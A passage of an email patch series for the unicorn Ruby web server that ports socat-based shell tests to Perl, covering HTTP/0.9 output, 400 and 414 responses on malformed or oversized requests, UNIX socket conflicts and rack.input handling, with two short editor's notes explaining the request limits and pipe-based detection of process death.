+	my $ht = HTTP::Tiny->new;
+	my $res = $ht->get("http://$host_port/write_on_close");
+	is($res->{content}, 'Goodbye', 'write-on-close body read');
+}
 
 # ... more stuff here
 undef $ar;
-diag slurp("$tmpdir/err.log") if $ENV{V};
+my @log = slurp("$tmpdir/err.log");
+diag("@log") if $ENV{V};
+my @err = grep(!/NameError.*Unicorn::Waiter/, grep(/error/i, @log));
+is_deeply(\@err, [], 'no unexpected errors in stderr');
+is_deeply([grep(/SIGKILL/, @log)], [], 'no SIGKILL in stderr');
+
 done_testing;
diff --git a/t/lib.perl b/t/lib.perl
index dd9c6b7..12deaf8 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -10,7 +10,7 @@ use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
 use File::Temp 0.19 (); # 0.19 for ->newdir
 our ($tmpdir, $errfh);
 our @EXPORT = qw(unicorn slurp tcp_server tcp_connect unicorn $tmpdir $errfh
-	SEEK_SET);
+	SEEK_SET tcp_host_port);
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
diff --git a/t/t0018-write-on-close.sh b/t/t0018-write-on-close.sh
deleted file mode 100755
index 3afefea..0000000
--- a/t/t0018-write-on-close.sh
+++ /dev/null
@@ -1,23 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 4 "write-on-close tests for funky response-bodies"
-
-t_begin "setup and start" && {
-	unicorn_setup
-	unicorn -D -c $unicorn_config write-on-close.ru
-	unicorn_wait_start
-}
-
-t_begin "write-on-close response body succeeds" && {
-	test xGoodbye = x"$(curl -sSf http://$listen/)"
-}
-
-t_begin "killing succeeds" && {
-	kill $unicorn_pid
-}
-
-t_begin "check stderr" && {
-	check_stderr
-}
-
-t_done
diff --git a/t/write-on-close.ru b/t/write-on-close.ru
deleted file mode 100644
index 725c4d6..0000000
--- a/t/write-on-close.ru
+++ /dev/null
@@ -1,11 +0,0 @@
-class WriteOnClose
-  def each(&block)
-    @callback = block
-  end
-
-  def close
-    @callback.call "7\r\nGoodbye\r\n0\r\n\r\n"
-  end
-end
-use Rack::ContentType, "text/plain"
-run(lambda { |_| [ 200, { 'transfer-encoding' => 'chunked' }, WriteOnClose.new ] })

[-- Attachment #5: 0004-port-t0000-http-basic.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 3372 bytes --]

From 1bb4362cee167ac7aeec910d3f52419e391f1e61 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:33 +0000
Subject: [PATCH 04/23] port t0000-http-basic.sh to Perl 5

One more socat dependency down...
---
 t/integration.ru      | 16 ++++++++++++++
 t/integration.t       | 11 ++++++++++
 t/t0000-http-basic.sh | 50 -------------------------------------------
 3 files changed, 27 insertions(+), 50 deletions(-)
 delete mode 100755 t/t0000-http-basic.sh

diff --git a/t/integration.ru b/t/integration.ru
index 12f5d48..c0bef99 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -32,6 +32,21 @@ def write_on_close
   [ 200, { 'transfer-encoding' => 'chunked' }, WriteOnClose.new ]
 end
 
+def env_dump(env)
+  require 'json'
+  h = {}
+  env.each do |k,v|
+    case v
+    when String, Integer, true, false; h[k] = v
+    else
+      case k
+      when 'rack.version', 'rack.after_reply'; h[k] = v
+      end
+    end
+  end
+  h.to_json
+end
+
 run(lambda do |env|
   case env['REQUEST_METHOD']
   when 'GET'
@@ -40,6 +55,7 @@ def write_on_close
     when '/rack-3-array-headers'; [ 200, { 'x-r3' => %w(a b c) }, [] ]
     when '/nil-header-value'; [ 200, { 'X-Nil' => nil }, [] ]
     when '/unknown-status-pass-through'; [ '666 I AM THE BEAST', {}, [] ]
+    when '/env_dump'; [ 200, {}, [ env_dump(env) ] ]
     when '/write_on_close'; write_on_close
     end # case PATH_INFO (GET)
   when 'POST'
diff --git a/t/integration.t b/t/integration.t
index 3ab5c90..ee22e7e 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -47,6 +47,17 @@ is_deeply([ grep(/^x-r3: /, @$hdr) ],
 	[ 'x-r3: a', 'x-r3: b', 'x-r3: c' ],
 	'rack 3 array headers supported') or diag(explain($hdr));
 
+SKIP: {
+	eval { require JSON::PP } or skip "JSON::PP missing: $@", 1;
+	$c = tcp_connect($srv);
+	print $c "GET /env_dump\r\n" or die $!;
+	my $json = do { local $/; readline($c) };
+	unlike($json, qr/^Connection: /smi, 'no connection header for 0.9');
+	unlike($json, qr!\AHTTP/!s, 'no HTTP/1.x prefix for 0.9');
+	my $env = JSON::PP->new->decode($json);
+	is(ref($env), 'HASH', 'JSON decoded body to hashref');
+	is($env->{SERVER_PROTOCOL}, 'HTTP/0.9', 'SERVER_PROTOCOL is 0.9');
+}
 
 # cf. <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
 $c = tcp_connect($srv);
diff --git a/t/t0000-http-basic.sh b/t/t0000-http-basic.sh
deleted file mode 100755
index 8ab58ac..0000000
--- a/t/t0000-http-basic.sh
+++ /dev/null
@@ -1,50 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 8 "simple HTTP connection tests"
-
-t_begin "setup and start" && {
-	unicorn_setup
-	unicorn -D -c $unicorn_config env.ru
-	unicorn_wait_start
-}
-
-t_begin "single request" && {
-	curl -sSfv http://$listen/
-}
-
-t_begin "check stderr has no errors" && {
-	check_stderr
-}
-
-t_begin "HTTP/0.9 request should not return headers" && {
-	(
-		printf 'GET /\r\n'
-		cat $fifo > $tmp &
-		wait
-		echo ok > $ok
-	) | socat - TCP:$listen > $fifo
-}
-
-t_begin "env.inspect should've put everything on one line" && {
-	test 1 -eq $(count_lines < $tmp)
-}
-
-t_begin "no headers in output" && {
-	if grep ^Connection: $tmp
-	then
-		die "Connection header found in $tmp"
-	elif grep ^HTTP/ $tmp
-	then
-		die "HTTP/ found in $tmp"
-	fi
-}
-
-t_begin "killing succeeds" && {
-	kill $unicorn_pid
-}
-
-t_begin "check stderr has no errors" && {
-	check_stderr
-}
-
-t_done

[-- Attachment #6: 0005-port-t0002-parser-error.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 4875 bytes --]

From 2eb7b1662c291ab535ee5dabf5d96194ca6483d4 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:34 +0000
Subject: [PATCH 05/23] port t0002-parser-error.sh to Perl 5

Another socat dependency down...
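
[Editor's note: the limits exercised below (12 * 1024 bytes for REQUEST_PATH,
10 * 1024 for QUERY_STRING, 1024 for FRAGMENT) come from the test descriptions
themselves. Constructing an over-limit request is straightforward:]

```ruby
# Build a GET request whose path just exceeds the 12 * 1024 byte
# REQUEST_PATH limit asserted by the test; unicorn should answer 414.
seg  = [*'0'..'9'].join + 'ab'     # 12 bytes, same pattern as the test
path = '/' + seg * 1024            # 1 + 12288 bytes, over the limit
req  = "GET #{path} HTTP/1.0\r\n\r\n"
```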
---
 t/integration.t         | 33 +++++++++++++++
 t/lib.perl              |  9 +++-
 t/t0002-parser-error.sh | 94 -----------------------------------------
 3 files changed, 41 insertions(+), 95 deletions(-)
 delete mode 100755 t/t0002-parser-error.sh

diff --git a/t/integration.t b/t/integration.t
index ee22e7e..503b7eb 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -85,6 +85,39 @@ SKIP: {
 	is($res->{content}, 'Goodbye', 'write-on-close body read');
 }
 
+if ('bad requests') {
+	$c = start_req($srv, 'GET /env_dump HTTP/1/1');
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 400 \b!, 'got 400 on bad request');
+
+	$c = tcp_connect($srv);
+	print $c 'GET /' or die $!;
+	my $buf = join('', (0..9), 'ab');
+	for (0..1023) { print $c $buf or die $! }
+	print $c " HTTP/1.0\r\n\r\n" or die $!;
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 414 \b!,
+		'414 on REQUEST_PATH > (12 * 1024)');
+
+	$c = tcp_connect($srv);
+	print $c 'GET /hello-world?a' or die $!;
+	$buf = join('', (0..9));
+	for (0..1023) { print $c $buf or die $! }
+	print $c " HTTP/1.0\r\n\r\n" or die $!;
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 414 \b!,
+		'414 on QUERY_STRING > (10 * 1024)');
+
+	$c = tcp_connect($srv);
+	print $c 'GET /hello-world#a' or die $!;
+	$buf = join('', (0..9), 'a'..'f');
+	for (0..63) { print $c $buf or die $! }
+	print $c " HTTP/1.0\r\n\r\n" or die $!;
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 414 \b!, '414 on FRAGMENT > (1024)');
+}
+
+
 # ... more stuff here
 undef $ar;
 my @log = slurp("$tmpdir/err.log");
diff --git a/t/lib.perl b/t/lib.perl
index 12deaf8..7d712b5 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -10,7 +10,7 @@ use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
 use File::Temp 0.19 (); # 0.19 for ->newdir
 our ($tmpdir, $errfh);
 our @EXPORT = qw(unicorn slurp tcp_server tcp_connect unicorn $tmpdir $errfh
-	SEEK_SET tcp_host_port);
+	SEEK_SET tcp_host_port start_req);
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
@@ -59,6 +59,13 @@ sub tcp_connect {
 	$s;
 }
 
+sub start_req {
+	my ($srv, @req) = @_;
+	my $c = tcp_connect($srv);
+	print $c @req, "\r\n\r\n" or die "print: $!";
+	$c;
+}
+
 sub slurp {
 	open my $fh, '<', $_[0] or die "open($_[0]): $!";
 	local $/;
diff --git a/t/t0002-parser-error.sh b/t/t0002-parser-error.sh
deleted file mode 100755
index 9dc1cd2..0000000
--- a/t/t0002-parser-error.sh
+++ /dev/null
@@ -1,94 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 11 "parser error test"
-
-t_begin "setup and startup" && {
-	unicorn_setup
-	unicorn -D env.ru -c $unicorn_config
-	unicorn_wait_start
-}
-
-t_begin "send a bad request" && {
-	(
-		printf 'GET / HTTP/1/1\r\nHost: example.com\r\n\r\n'
-		cat $fifo > $tmp &
-		wait
-		echo ok > $ok
-	) | socat - TCP:$listen > $fifo
-	test xok = x$(cat $ok)
-}
-
-dbgcat tmp
-
-t_begin "response should be a 400" && {
-	grep -F 'HTTP/1.1 400 Bad Request' $tmp
-}
-
-t_begin "send a huge Request URI (REQUEST_PATH > (12 * 1024))" && {
-	rm -f $tmp
-	cat $fifo > $tmp &
-	(
-		set -e
-		trap 'echo ok > $ok' EXIT
-		printf 'GET /'
-		for i in $(awk </dev/null 'BEGIN{for(i=0;i<1024;i++) print i}')
-		do
-			printf '0123456789ab'
-		done
-		printf ' HTTP/1.1\r\nHost: example.com\r\n\r\n'
-	) | socat - TCP:$listen > $fifo || :
-	test xok = x$(cat $ok)
-	wait
-}
-
-t_begin "response should be a 414 (REQUEST_PATH)" && {
-	grep -F 'HTTP/1.1 414 ' $tmp
-}
-
-t_begin "send a huge Request URI (QUERY_STRING > (10 * 1024))" && {
-	rm -f $tmp
-	cat $fifo > $tmp &
-	(
-		set -e
-		trap 'echo ok > $ok' EXIT
-		printf 'GET /hello-world?a'
-		for i in $(awk </dev/null 'BEGIN{for(i=0;i<1024;i++) print i}')
-		do
-			printf '0123456789'
-		done
-		printf ' HTTP/1.1\r\nHost: example.com\r\n\r\n'
-	) | socat - TCP:$listen > $fifo || :
-	test xok = x$(cat $ok)
-	wait
-}
-
-t_begin "response should be a 414 (QUERY_STRING)" && {
-	grep -F 'HTTP/1.1 414 ' $tmp
-}
-
-t_begin "send a huge Request URI (FRAGMENT > 1024)" && {
-	rm -f $tmp
-	cat $fifo > $tmp &
-	(
-		set -e
-		trap 'echo ok > $ok' EXIT
-		printf 'GET /hello-world#a'
-		for i in $(awk </dev/null 'BEGIN{for(i=0;i<64;i++) print i}')
-		do
-			printf '0123456789abcdef'
-		done
-		printf ' HTTP/1.1\r\nHost: example.com\r\n\r\n'
-	) | socat - TCP:$listen > $fifo || :
-	test xok = x$(cat $ok)
-	wait
-}
-
-t_begin "response should be a 414 (FRAGMENT)" && {
-	grep -F 'HTTP/1.1 414 ' $tmp
-}
-
-t_begin "server stderr should be clean" && check_stderr
-
-t_begin "term signal sent" && kill $unicorn_pid
-
-t_done

[-- Attachment #7: 0006-t-integration.t-use-start_req-to-simplify-test-sligh.patch --]
[-- Type: text/x-diff, Size: 2556 bytes --]

From 0bb06cc0c8c4f5b76514858067bbb2871dda0d6e Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:35 +0000
Subject: [PATCH 06/23] t/integration.t: use start_req to simplify test slightly

Less code is usually better.
---
 t/integration.t | 18 ++++++------------
 1 file changed, 6 insertions(+), 12 deletions(-)

diff --git a/t/integration.t b/t/integration.t
index 503b7eb..b7ba1fb 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -20,8 +20,7 @@ sub slurp_hdr {
 my ($c, $status, $hdr);
 
 # response header tests
-$c = tcp_connect($srv);
-print $c "GET /rack-2-newline-headers HTTP/1.0\r\n\r\n" or die $!;
+$c = start_req($srv, 'GET /rack-2-newline-headers HTTP/1.0');
 ($status, $hdr) = slurp_hdr($c);
 like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
 my $orig_200_status = $status;
@@ -40,8 +39,7 @@ SKIP: { # Date header check
 };
 
 
-$c = tcp_connect($srv);
-print $c "GET /rack-3-array-headers HTTP/1.0\r\n\r\n" or die $!;
+$c = start_req($srv, 'GET /rack-3-array-headers HTTP/1.0');
 ($status, $hdr) = slurp_hdr($c);
 is_deeply([ grep(/^x-r3: /, @$hdr) ],
 	[ 'x-r3: a', 'x-r3: b', 'x-r3: c' ],
@@ -49,8 +47,7 @@ is_deeply([ grep(/^x-r3: /, @$hdr) ],
 
 SKIP: {
 	eval { require JSON::PP } or skip "JSON::PP missing: $@", 1;
-	$c = tcp_connect($srv);
-	print $c "GET /env_dump\r\n" or die $!;
+	my $c = start_req($srv, 'GET /env_dump');
 	my $json = do { local $/; readline($c) };
 	unlike($json, qr/^Connection: /smi, 'no connection header for 0.9');
 	unlike($json, qr!\AHTTP/!s, 'no HTTP/1.x prefix for 0.9');
@@ -60,20 +57,17 @@ SKIP: {
 }
 
 # cf. <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
-$c = tcp_connect($srv);
-print $c "GET /nil-header-value HTTP/1.0\r\n\r\n" or die $!;
+$c = start_req($srv, 'GET /nil-header-value HTTP/1.0');
 ($status, $hdr) = slurp_hdr($c);
 is_deeply([grep(/^X-Nil:/, @$hdr)], ['X-Nil: '],
 	'nil header value accepted for broken apps') or diag(explain($hdr));
 
 if ('TODO: ensure Rack::Utils::HTTP_STATUS_CODES is available') {
-	$c = tcp_connect($srv);
-	print $c "POST /tweak-status-code HTTP/1.0\r\n\r\n" or die $!;
+	$c = start_req($srv, 'POST /tweak-status-code HTTP/1.0');
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 200 HI\b!, 'status tweaked');
 
-	$c = tcp_connect($srv);
-	print $c "POST /restore-status-code HTTP/1.0\r\n\r\n" or die $!;
+	$c = start_req($srv, 'POST /restore-status-code HTTP/1.0');
 	($status, $hdr) = slurp_hdr($c);
 	is($status, $orig_200_status, 'original status restored');
 }

[-- Attachment #8: 0007-port-t0011-active-unix-socket.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 6945 bytes --]

From 10c83beaca58df8b92d8228e798559069cd89beb Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:36 +0000
Subject: [PATCH 07/23] port t0011-active-unix-socket.sh to Perl 5

Another socat dependency down...  I've also started turning
FD_CLOEXEC off on a pipe as a mechanism to detect daemonized
process death in tests.
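
[Editor's note: the trick works because a pipe's read end only reports EOF once
every copy of the write end is closed; clearing close-on-exec lets the
daemonized process inherit the write end, so EOF signals its death. A
self-contained sketch of the mechanism, using fork in place of a daemonized
unicorn:]

```ruby
# Pipe-based death detection: the child inherits the write end; once it
# exits, the parent's read end hits EOF.
r, w = IO.pipe
w.close_on_exec = false # so an exec'd daemon would keep the write end open
pid = fork do
  sleep 0.1 # stand-in for a daemon doing work; inherits w implicitly
end
w.close # parent drops its copy; only the child holds a write end now
ready = IO.select([r], nil, nil, 5) # wakes once the child exits
eof = r.read.empty?                 # empty read => all writers are gone
Process.waitpid(pid)
```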
---
 t/active-unix-socket.t        | 117 ++++++++++++++++++++++++++++++++++
 t/integration.ru              |   1 +
 t/t0011-active-unix-socket.sh |  79 -----------------------
 3 files changed, 118 insertions(+), 79 deletions(-)
 create mode 100644 t/active-unix-socket.t
 delete mode 100755 t/t0011-active-unix-socket.sh

diff --git a/t/active-unix-socket.t b/t/active-unix-socket.t
new file mode 100644
index 0000000..6b5c218
--- /dev/null
+++ b/t/active-unix-socket.t
@@ -0,0 +1,117 @@
+#!perl -w
+# Copyright (C) unicorn hackers <unicorn-public@yhbt.net>
+# License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
+
+use v5.14; BEGIN { require './t/lib.perl' };
+use IO::Socket::UNIX;
+my %to_kill;
+END { kill('TERM', values(%to_kill)) if keys %to_kill }
+my $u1 = "$tmpdir/u1.sock";
+my $u2 = "$tmpdir/u2.sock";
+my $unix_req = sub {
+	my $s = IO::Socket::UNIX->new(Peer => shift, Type => SOCK_STREAM);
+	print $s @_, "\r\n\r\n" or die $!;
+	$s;
+};
+{
+	use autodie;
+	open my $fh, '>', "$tmpdir/u1.conf.rb";
+	print $fh <<EOM;
+pid "$tmpdir/u.pid"
+listen "$u1"
+stderr_path "$tmpdir/err1.log"
+EOM
+	close $fh;
+
+	open $fh, '>', "$tmpdir/u2.conf.rb";
+	print $fh <<EOM;
+pid "$tmpdir/u.pid"
+listen "$u2"
+stderr_path "$tmpdir/err2.log"
+EOM
+	close $fh;
+
+	open $fh, '>', "$tmpdir/u3.conf.rb";
+	print $fh <<EOM;
+pid "$tmpdir/u3.pid"
+listen "$u1"
+stderr_path "$tmpdir/err3.log"
+EOM
+	close $fh;
+}
+
+my @uarg = qw(-D -E none t/integration.ru);
+
+# this pipe will be used to notify us when all daemons die:
+pipe(my ($p0, $p1)) or die "pipe: $!";
+fcntl($p1, POSIX::F_SETFD, 0) or die "fcntl: $!"; # clear FD_CLOEXEC
+
+# start the first instance
+unicorn('-c', "$tmpdir/u1.conf.rb", @uarg)->join;
+is($?, 0, 'daemonized 1st process');
+chomp($to_kill{u1} = slurp("$tmpdir/u.pid"));
+like($to_kill{u1}, qr/\A\d+\z/s, 'read pid file');
+
+chomp(my $worker_pid = readline($unix_req->($u1, 'GET /pid')));
+like($worker_pid, qr/\A\d+\z/s, 'captured worker pid');
+ok(kill(0, $worker_pid), 'worker is kill-able');
+
+
+# 2nd process conflicts on PID
+unicorn('-c', "$tmpdir/u2.conf.rb", @uarg)->join;
+isnt($?, 0, 'conflicting PID file fails to start');
+
+chomp(my $pidf = slurp("$tmpdir/u.pid"));
+is($pidf, $to_kill{u1}, 'pid file contents unchanged after start failure');
+
+chomp(my $pid2 = readline($unix_req->($u1, 'GET /pid')));
+is($worker_pid, $pid2, 'worker PID unchanged');
+
+
+# 3rd process conflicts on socket
+unicorn('-c', "$tmpdir/u3.conf.rb", @uarg)->join;
+isnt($?, 0, 'conflicting UNIX socket fails to start');
+
+chomp($pid2 = readline($unix_req->($u1, 'GET /pid')));
+is($worker_pid, $pid2, 'worker PID still unchanged');
+
+chomp($pidf = slurp("$tmpdir/u.pid"));
+is($pidf, $to_kill{u1}, 'pid file contents unchanged after 2nd start failure');
+
+{ # teardown initial process via SIGKILL
+	ok(kill('KILL', delete $to_kill{u1}), 'SIGKILL initial daemon');
+	close $p1;
+	vec(my $rvec = '', fileno($p0), 1) = 1;
+	is(select($rvec, undef, undef, 5), 1, 'timeout for pipe HUP');
+	is(my $undef = <$p0>, undef, 'process closed pipe writer at exit');
+	ok(-f "$tmpdir/u.pid", 'pid file stayed after SIGKILL');
+	ok(-S $u1, 'socket stayed after SIGKILL');
+	is(IO::Socket::UNIX->new(Peer => $u1, Type => SOCK_STREAM), undef,
+		'fail to connect to u1');
+	ok(!kill(0, $worker_pid), 'worker gone after parent dies');
+}
+
+# restart the first instance
+{
+	pipe(($p0, $p1)) or die "pipe: $!";
+	fcntl($p1, POSIX::F_SETFD, 0) or die "fcntl: $!"; # clear FD_CLOEXEC
+	unicorn('-c', "$tmpdir/u1.conf.rb", @uarg)->join;
+	is($?, 0, 'daemonized 1st process');
+	chomp($to_kill{u1} = slurp("$tmpdir/u.pid"));
+	like($to_kill{u1}, qr/\A\d+\z/s, 'read pid file');
+
+	chomp($pid2 = readline($unix_req->($u1, 'GET /pid')));
+	like($pid2, qr/\A\d+\z/, 'worker running');
+
+	ok(kill('TERM', delete $to_kill{u1}), 'SIGTERM restarted daemon');
+	close $p1;
+	vec(my $rvec = '', fileno($p0), 1) = 1;
+	is(select($rvec, undef, undef, 5), 1, 'timeout for pipe HUP');
+	is(my $undef = <$p0>, undef, 'process closed pipe writer at exit');
+	ok(!-f "$tmpdir/u.pid", 'pid file gone after SIGTERM');
+	ok(-S $u1, 'socket stays after SIGTERM');
+}
+
+my @log = slurp("$tmpdir/err.log");
+diag("@log") if $ENV{V};
+done_testing;
diff --git a/t/integration.ru b/t/integration.ru
index c0bef99..21f5449 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -57,6 +57,7 @@ def env_dump(env)
     when '/unknown-status-pass-through'; [ '666 I AM THE BEAST', {}, [] ]
     when '/env_dump'; [ 200, {}, [ env_dump(env) ] ]
     when '/write_on_close'; write_on_close
+    when '/pid'; [ 200, {}, [ "#$$\n" ] ]
     end # case PATH_INFO (GET)
   when 'POST'
     case env['PATH_INFO']
diff --git a/t/t0011-active-unix-socket.sh b/t/t0011-active-unix-socket.sh
deleted file mode 100755
index fae0b6c..0000000
--- a/t/t0011-active-unix-socket.sh
+++ /dev/null
@@ -1,79 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 11 "existing UNIX domain socket check"
-
-read_pid_unix () {
-	x=$(printf 'GET / HTTP/1.0\r\n\r\n' | \
-	    socat - UNIX:$unix_socket | \
-	    tail -1)
-	test -n "$x"
-	y="$(expr "$x" : '\([0-9][0-9]*\)')"
-	test x"$x" = x"$y"
-	test -n "$y"
-	echo "$y"
-}
-
-t_begin "setup and start" && {
-	rtmpfiles unix_socket unix_config
-	rm -f $unix_socket
-	unicorn_setup
-	grep -v ^listen < $unicorn_config > $unix_config
-	echo "listen '$unix_socket'" >> $unix_config
-	unicorn -D -c $unix_config pid.ru
-	unicorn_wait_start
-	orig_master_pid=$unicorn_pid
-}
-
-t_begin "get pid of worker" && {
-	worker_pid=$(read_pid_unix)
-	t_info "worker_pid=$worker_pid"
-}
-
-t_begin "fails to start with existing pid file" && {
-	rm -f $ok
-	unicorn -D -c $unix_config pid.ru || echo ok > $ok
-	test x"$(cat $ok)" = xok
-}
-
-t_begin "worker pid unchanged" && {
-	test x"$(read_pid_unix)" = x$worker_pid
-	> $r_err
-}
-
-t_begin "fails to start with listening UNIX domain socket bound" && {
-	rm $ok $pid
-	unicorn -D -c $unix_config pid.ru || echo ok > $ok
-	test x"$(cat $ok)" = xok
-	> $r_err
-}
-
-t_begin "worker pid unchanged (again)" && {
-	test x"$(read_pid_unix)" = x$worker_pid
-}
-
-t_begin "nuking the existing Unicorn succeeds" && {
-	kill -9 $unicorn_pid
-	while kill -0 $unicorn_pid
-	do
-		sleep 1
-	done
-	check_stderr
-}
-
-t_begin "succeeds in starting with leftover UNIX domain socket bound" && {
-	test -S $unix_socket
-	unicorn -D -c $unix_config pid.ru
-	unicorn_wait_start
-}
-
-t_begin "worker pid changed" && {
-	test x"$(read_pid_unix)" != x$worker_pid
-}
-
-t_begin "killing succeeds" && {
-	kill $unicorn_pid
-}
-
-t_begin "no errors" && check_stderr
-
-t_done

[-- Attachment #9: 0008-port-t0100-rack-input-tests.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 11722 bytes --]

From b4ed148186295f2d5c8448eab7f2b201615d1e4e Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:37 +0000
Subject: [PATCH 08/23] port t0100-rack-input-tests.sh to Perl 5

Yet another socat dependency gone \o/
---
 t/bin/content-md5-put       |  36 -----------
 t/integration.ru            |  27 +++++++-
 t/integration.t             |  97 +++++++++++++++++++++++++++-
 t/lib.perl                  |   3 +-
 t/rack-input-tests.ru       |  21 ------
 t/t0100-rack-input-tests.sh | 124 ------------------------------------
 6 files changed, 124 insertions(+), 184 deletions(-)
 delete mode 100755 t/bin/content-md5-put
 delete mode 100644 t/rack-input-tests.ru
 delete mode 100755 t/t0100-rack-input-tests.sh

diff --git a/t/bin/content-md5-put b/t/bin/content-md5-put
deleted file mode 100755
index 01da0bb..0000000
--- a/t/bin/content-md5-put
+++ /dev/null
@@ -1,36 +0,0 @@
-#!/usr/bin/env ruby
-# -*- encoding: binary -*-
-# simple chunked HTTP PUT request generator (and just that),
-# it reads stdin and writes to stdout so socat can write to a
-# UNIX or TCP socket (or to another filter or file) along with
-# a Content-MD5 trailer.
-require 'digest/md5'
-$stdout.sync = $stderr.sync = true
-$stdout.binmode
-$stdin.binmode
-
-bs = ENV['bs'] ? ENV['bs'].to_i : 4096
-
-if ARGV.grep("--no-headers").empty?
-  $stdout.write(
-      "PUT / HTTP/1.1\r\n" \
-      "Host: example.com\r\n" \
-      "Transfer-Encoding: chunked\r\n" \
-      "Trailer: Content-MD5\r\n" \
-      "\r\n"
-    )
-end
-
-digest = Digest::MD5.new
-if buf = $stdin.readpartial(bs)
-  begin
-    digest.update(buf)
-    $stdout.write("%x\r\n" % [ buf.size ])
-    $stdout.write(buf)
-    $stdout.write("\r\n")
-  end while $stdin.read(bs, buf)
-end
-
-digest = [ digest.digest ].pack('m').strip
-$stdout.write("0\r\n")
-$stdout.write("Content-MD5: #{digest}\r\n\r\n")
diff --git a/t/integration.ru b/t/integration.ru
index 21f5449..98528f6 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -47,6 +47,29 @@ def env_dump(env)
   h.to_json
 end
 
+def rack_input_tests(env)
+  return [ 100, {}, [] ] if /\A100-continue\z/i =~ env['HTTP_EXPECT']
+  cap = 16384
+  require 'digest/sha1'
+  digest = Digest::SHA1.new
+  input = env['rack.input']
+  case env['PATH_INFO']
+  when '/rack_input/size_first'; input.size
+  when '/rack_input/rewind_first'; input.rewind
+  when '/rack_input'; # OK
+  else
+    abort "bad path: #{env['PATH_INFO']}"
+  end
+  if buf = input.read(rand(cap))
+    begin
+      raise "#{buf.size} > #{cap}" if buf.size > cap
+      digest.update(buf)
+    end while input.read(rand(cap), buf)
+  end
+  [ 200, {'content-length' => '40', 'content-type' => 'text/plain'},
+    [ digest.hexdigest ] ]
+end
+
 run(lambda do |env|
   case env['REQUEST_METHOD']
   when 'GET'
@@ -66,6 +89,8 @@ def env_dump(env)
     end # case PATH_INFO (POST)
     # ...
   when 'PUT'
-    # ...
+    case env['PATH_INFO']
+    when %r{\A/rack_input}; rack_input_tests(env)
+    end
   end # case REQUEST_METHOD
 end) # run
diff --git a/t/integration.t b/t/integration.t
index b7ba1fb..8cef561 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -1,13 +1,16 @@
 #!perl -w
 # Copyright (C) unicorn hackers <unicorn-public@yhbt.net>
 # License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
+# this is the main integration test for things which don't require
+# restarting or signals
 
 use v5.14; BEGIN { require './t/lib.perl' };
 my $srv = tcp_server();
 my $host_port = tcp_host_port($srv);
 my $t0 = time;
 my $ar = unicorn(qw(-E none t/integration.ru), { 3 => $srv });
-
+my $curl = which('curl');
+END { diag slurp("$tmpdir/err.log") if $tmpdir };
 sub slurp_hdr {
 	my ($c) = @_;
 	local $/ = "\r\n\r\n"; # affects both readline+chomp
@@ -17,6 +20,48 @@ sub slurp_hdr {
 	($status, \@hdr);
 }
 
+my %PUT = (
+	chunked_md5 => sub {
+		my ($in, $out, $path, %opt) = @_;
+		my $bs = $opt{bs} // 16384;
+		require Digest::MD5;
+		my $dig = Digest::MD5->new;
+		print $out <<EOM;
+PUT $path HTTP/1.1\r
+Transfer-Encoding: chunked\r
+Trailer: Content-MD5\r
+\r
+EOM
+		my ($buf, $r);
+		while (1) {
+			$r = read($in, $buf, $bs) // die "read: $!";
+			last if $r == 0;
+			printf $out "%x\r\n", length($buf);
+			print $out $buf, "\r\n";
+			$dig->add($buf);
+		}
+		print $out "0\r\nContent-MD5: ", $dig->b64digest, "\r\n\r\n";
+	},
+	identity => sub {
+		my ($in, $out, $path, %opt) = @_;
+		my $bs = $opt{bs} // 16384;
+		my $clen = $opt{-s} // -s $in;
+		print $out <<EOM;
+PUT $path HTTP/1.0\r
+Content-Length: $clen\r
+\r
+EOM
+		my ($buf, $r, $len);
+		while ($clen) {
+			$len = $clen > $bs ? $bs : $clen;
+			$r = read($in, $buf, $len) // die "read: $!";
+			die 'premature EOF' if $r == 0;
